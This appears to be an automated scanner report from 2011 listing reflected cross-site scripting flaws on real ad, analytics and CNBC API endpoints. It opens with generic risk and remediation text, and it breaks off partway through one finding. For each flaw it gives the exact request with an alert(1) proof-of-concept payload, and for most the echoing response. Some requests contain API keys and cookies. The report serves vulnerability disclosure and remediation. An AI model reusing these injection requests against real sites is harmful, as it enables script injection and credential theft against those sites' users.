arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
3.1. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.adsonar.com
Path:
/adserving/getAds.jsp
Issue detail
The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 1e863<script>alert(1)</script>03af89ea0d9 was submitted in the pid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=22577671e863<script>alert(1)</script>03af89ea0d9 &ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: oo_flag=t
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:21 GMT Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/html;charset=utf-8 Vary: Accept-Encoding,User-Agent Content-Length: 2510 <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN"> <html> <head> <title>Ads by Quigo</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...[SNIP]... </script> java.lang.NumberFormatException: For input string: "22577671e863<script>alert(1)</script>03af89ea0d9 " </head>...[SNIP]...
3.2. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.adsonar.com
Path:
/adserving/getAds.jsp
Issue detail
The value of the placementId request parameter is copied into an HTML comment. The payload 34bbc--><script>alert(1)</script>f035f2c61ed was submitted in the placementId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=151549134bbc--><script>alert(1)</script>f035f2c61ed &pid=2257767&ps=-1&zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: oo_flag=t
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:19 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3548 Content-Type: text/plain <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "151549134bbc--><script>alert(1)</script>f035f2c61ed " -->...[SNIP]...
3.3. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.adsonar.com
Path:
/adserving/getAds.jsp
Issue detail
The value of the ps request parameter is copied into an HTML comment. The payload 1452a--><script>alert(1)</script>8a3c8bebaae was submitted in the ps parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1515491&pid=2257767&ps=-11452a--><script>alert(1)</script>8a3c8bebaae &zw=336&zh=300&url=http%3A//www.cnbc.com/&v=5&dct=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&ref=http%3A//search.cnbc.com/main.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D%28The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM%29%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: ads.adsonar.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: oo_flag=t
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 14:57:24 GMT Vary: Accept-Encoding,User-Agent Content-Length: 3987 Content-Type: text/plain <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <body> <!-- java.lang.NumberFormatException: For input string: "-11452a--><script>alert(1)</script>8a3c8bebaae " --> ...[SNIP]...
3.4. http://ads.rnmd.net/getAds [adDiv parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ads.rnmd.net
Path:
/getAds
Issue detail
The value of the adDiv request parameter is copied into the HTML document as plain text between tags. The payload 5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 was submitted in the adDiv parameter. This input was echoed as 5a098<img src=a onerror=alert(1)>13fd8da2931 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad5a098<img%20src%3da%20onerror%3dalert(1)>13fd8da2931 &appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1 Host: ads.rnmd.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:07:53 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache x-rnmd-pc: 208.91.189.56 Content-Type: application/x-javascript Content-Length: 709 Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:53 GMT Connection: close net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad5a098<img src=a onerror=alert(1)>13fd8da2931 ","htmlPayload":"<div style=\"text-align: center\">...[SNIP]...
3.5. http://api-cdn.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api-cdn.cnbc.com
Path:
/api/chart/chart.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 34781<script>alert(1)</script>ee34ae3f437 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/chart/chart.asp?34781<script>alert(1)</script>ee34ae3f437 =1 HTTP/1.1 Host: api-cdn.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Content-Type: text/html Cache-Control: private Expires: Tue, 06 Sep 2011 16:25:59 GMT X-Powered-By: ASP.NET IISExport: This web site was exported using IIS Export v4.2 P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Date: Tue, 06 Sep 2011 17:05:59 GMT Content-Length: 182 Connection: close <pre>An Error occurred with this request.34781<script>alert(1)</script>ee34ae3f437 =1</pre>&34781<script>alert(1)</script>ee34ae3f437=1&DCLCore.InternalID=CNAPI">Test link</a><br />
3.6. http://api-public.addthis.com/url/shares.json [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api-public.addthis.com
Path:
/url/shares.json
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c34f5<script>alert(1)</script>a13262bf45d was submitted in the callback parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /url/shares.json?url=http%3A%2F%2Fwww.dove.us%2FProducts%2FHair%2F&callback=_ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d HTTP/1.1 Host: api-public.addthis.com Proxy-Connection: keep-alive Referer: http://www.dove.us/Products/Hair/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,72|36
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=600 Content-Type: application/javascript;charset=UTF-8 Date: Tue, 06 Sep 2011 16:45:50 GMT Content-Length: 96 Connection: close _ate.cbs.sc_httpwwwdoveusProductsHair68c34f5<script>alert(1)</script>a13262bf45d ({"shares":19});
3.7. http://api.bizographics.com/v1/profile.json [api_key parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.json
Issue detail
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload e1c14<script>alert(1)</script>d994c816c62 was submitted in the api_key parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62 &callback=_bizo_callback HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Tue, 06 Sep 2011 15:33:13 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 92 Connection: keep-alive Unknown API key: (7a1b8d0563d44781afdd2ab0834934ffe1c14<script>alert(1)</script>d994c816c62 )
3.8. http://api.bizographics.com/v1/profile.json [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.json
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6718<script>alert(1)</script>2d7bd36d61c was submitted in the callback parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.json?api_key=7a1b8d0563d44781afdd2ab0834934ff&callback=_bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c HTTP/1.1 Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BizographicsOptOut=OPT_OUT
Response
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: application/json Date: Tue, 06 Sep 2011 15:33:16 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Content-Length: 204 Connection: keep-alive _bizo_callbacke6718<script>alert(1)</script>2d7bd36d61c ({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});
3.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.redirect
Issue detail
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 5af80<script>alert(1)</script>e6879303a2a was submitted in the api_key parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a &callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: api.bizographics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Tue, 06 Sep 2011 15:00:50 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 92 Connection: keep-alive Unknown API key: (798c7ba2e6b04aec86d660f36f6341a55af80<script>alert(1)</script>e6879303a2a )
3.10. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.redirect
Issue detail
The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload db976<script>alert(1)</script>5d2b699441d was submitted in the callback_url parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=db976<script>alert(1)</script>5d2b699441d HTTP/1.1 Host: api.bizographics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie
Response
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Tue, 06 Sep 2011 15:00:52 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1ab5c8f2c82f8e20ad7e6bdfc8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Content-Length: 58 Connection: keep-alive Unknown Referer: db976<script>alert(1)</script>5d2b699441d
3.11. http://api.cnbc.com/api/chart/chart.asp [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.cnbc.com
Path:
/api/chart/chart.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 90215<script>alert(1)</script>736c487a586 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/chart/chart.asp?90215<script>alert(1)</script>736c487a586 =1 HTTP/1.1 Host: api.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 17:06:00 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding Cache-Control: private Content-Length: 182 Expires: Tue, 06 Sep 2011 16:26:00 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" <pre>An Error occurred with this request.90215<script>alert(1)</script>736c487a586 =1</pre>&90215<script>alert(1)</script>736c487a586=1&DCLCore.InternalID=CNAPI">Test link</a><br />
3.12. http://api.cnbc.com/api/movers/movers.asp [chartType parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.cnbc.com
Path:
/api/movers/movers.asp
Issue detail
The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98f0d"><script>alert(1)</script>2d1497842a9 was submitted in the chartType parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/movers/movers.asp?chartType=gainers98f0d"><script>alert(1)</script>2d1497842a9 &rowCount=3&link=quote HTTP/1.1 Host: api.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 14:57:13 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Cache-Control: private Expires: Tue, 06 Sep 2011 14:17:13 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 1975 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Market Movers</title> <link rel='stylesheet' ty...[SNIP]... <div id="module" rowCount="3" chartType="gainers98f0d"><script>alert(1)</script>2d1497842a9 ">...[SNIP]...
3.13. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.cnbc.com
Path:
/api/movers/movers.asp
Issue detail
The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 467b2"><script>alert(1)</script>23b923cf03b was submitted in the rowCount parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/movers/movers.asp?chartType=gainers&rowCount=3467b2"><script>alert(1)</script>23b923cf03b &link=quote HTTP/1.1 Host: api.cnbc.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV
Response
HTTP/1.1 200 OK Server: nginx Date: Tue, 06 Sep 2011 14:57:16 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding Cache-Control: private Expires: Tue, 06 Sep 2011 14:17:15 GMT IISExport: This web site was exported using IIS Export v4.2 X-Powered-By: ASP.NET P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND" Content-Length: 53613 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Market Movers</title> <link rel='stylesheet' ty...[SNIP]... <div id="module" rowCount="3467b2"><script>alert(1)</script>23b923cf03b " chartType="gainers">...[SNIP]...
3.14. http://api.viglink.com/api/ping [jsonp parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://api.viglink.com
Path:
/api/ping
Issue detail
The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 3a9ec<script>alert(1)</script>4d02caaf2cd was submitted in the jsonp parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/ping?format=jsonp&key=021de175e1e571c67cfaeea3c68d72e8&loc=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&v=1&jsonp=vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php Origin: http://www.readwriteweb.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: http://www.readwriteweb.com Cache-Control: no-store, no-cache, must-revalidate Content-Language: en-US Content-Type: text/javascript;charset=UTF-8 Date: Tue, 06 Sep 2011 15:33:39 GMT Expires: Sat, 06 May 1995 12:00:00 GMT Pragma: no-cache Content-Length: 160 Connection: keep-alive vglnk_jsonp_131534117167203a9ec<script>alert(1)</script>4d02caaf2cd (1315323219590,2000,[],[],{"plugins":{},"timeClick":true,"debug":false,"timePing":false},[]);
3.15. http://b.scorecardresearch.com/beacon.js [c1 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/beacon.js
Issue detail
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload b7be8<script>alert(1)</script>8499cdf77af was submitted in the c1 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
